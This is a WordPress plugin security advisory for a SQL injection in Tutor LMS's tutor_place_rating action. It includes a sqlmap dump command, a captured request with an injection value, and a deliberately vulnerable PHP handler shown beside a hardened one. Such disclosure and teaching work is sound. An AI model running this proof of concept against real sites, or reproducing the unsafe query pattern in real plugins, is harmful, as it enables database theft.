WordPress Plugin Vulnerabilities

Tutor LMS < 1.7.7 - SQL Injection via tutor_place_rating

Description

The tutor_place_rating AJAX action of the plugin was vulnerable to blind (boolean-based) and time-based SQL injection. Because the action is reachable by any authenticated student, a low-privileged account was sufficient to exploit it.

Proof of Concept

python3 sqlmap.py -r ~/tutor2.txt --dbms=mysql --technique=B -p course_id --dump

where ~/tutor2.txt contains the captured request below (the host and the student session cookie are placeholders):

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: [URL]
Content-Length: 69
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: [URL]
Referer: [URL]/courses/first-class/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [STUDENTCOOKIES]
Connection: close

course_id=26&rating=5&review=%3B'&action=tutor_place_rating
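To show the defect class behind this advisory from the fixing side, here is an added illustration of a WordPress AJAX rating handler written two ways. This is not Tutor LMS code; the hook name, table name, column names and nonce action are assumed. The first function interpolates request values straight into SQL, which is the pattern a blind or time-based injection exploits; the second applies the checks a plugin handler should have (login, nonce, type coercion, bounds, and a prepared statement via $wpdb->prepare()).

```php
<?php
/*
 * Added illustration, not Tutor LMS code. The hook name, table name,
 * column names and nonce action are assumptions. Only the hardened
 * handler is registered; the vulnerable one is kept to make the defect concrete.
 */

// VULNERABLE pattern: request values are concatenated into the query.
// A logged-in student controls $_POST, so the values become part of the SQL
// text; a quote in $review ends the string literal and the rest is executed.
function example_place_rating_vulnerable() {
    global $wpdb;
    $course_id = $_POST['course_id'];
    $rating    = $_POST['rating'];
    $review    = $_POST['review'];

    $wpdb->query(
        "INSERT INTO {$wpdb->prefix}example_ratings (course_id, user_id, rating, review)
         VALUES ($course_id, " . get_current_user_id() . ", $rating, '$review')"
    );
    wp_send_json_success();
}

// HARDENED pattern: authentication, nonce, type coercion, bounds checking,
// and a prepared statement. A value that slips past validation still reaches
// MySQL as data, never as SQL.
function example_place_rating_hardened() {
    if ( ! is_user_logged_in() ) {
        wp_send_json_error( 'login required', 401 );
    }
    // Nonce action name is assumed; the rating form must emit a matching nonce.
    check_ajax_referer( 'example_place_rating', 'nonce' );

    $course_id = absint( $_POST['course_id'] ?? 0 );
    $rating    = absint( $_POST['rating'] ?? 0 );
    $review    = sanitize_textarea_field( wp_unslash( $_POST['review'] ?? '' ) );

    if ( 0 === $course_id || $rating < 1 || $rating > 5 ) {
        wp_send_json_error( 'invalid input', 400 );
    }
    // Assumed rule: a course is a published post of the site.
    if ( 'publish' !== get_post_status( $course_id ) ) {
        wp_send_json_error( 'unknown course', 404 );
    }

    global $wpdb;
    $table = $wpdb->prefix . 'example_ratings';
    // $wpdb->prepare() takes printf-style placeholders: %d is cast to an
    // integer and %s is escaped and quoted by WordPress, so the review text
    // cannot terminate the string literal or append further statements.
    $wpdb->query( $wpdb->prepare(
        "INSERT INTO {$table} (course_id, user_id, rating, review) VALUES (%d, %d, %d, %s)",
        $course_id, get_current_user_id(), $rating, $review
    ) );
    wp_send_json_success();
}

// wp_ajax_{action} only fires for authenticated users; there is deliberately
// no wp_ajax_nopriv_ registration for this handler.
add_action( 'wp_ajax_example_place_rating', 'example_place_rating_hardened' );
```

When reviewing a plugin for this class of bug, the signals to look for are a $wpdb->query() or $wpdb->get_results() call whose SQL string is built with concatenation or interpolation from $_POST, $_GET or $_REQUEST, and an AJAX handler registered with wp_ajax_ (or wp_ajax_nopriv_) that lacks a capability or nonce check. $wpdb->insert() with a format array is an equally safe alternative to prepare() for plain inserts.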

Affects Plugins

Tutor LMS, fixed in 1.7.7

Classification

Type: SQLI

Miscellaneous

Original Researcher: Chloe Chamberland
Submitter: Chloe Chamberland
Verified: Yes

Timeline

Publicly Published: 2021-03-15
Added: 2021-03-15
Last Updated: 2021-03-20
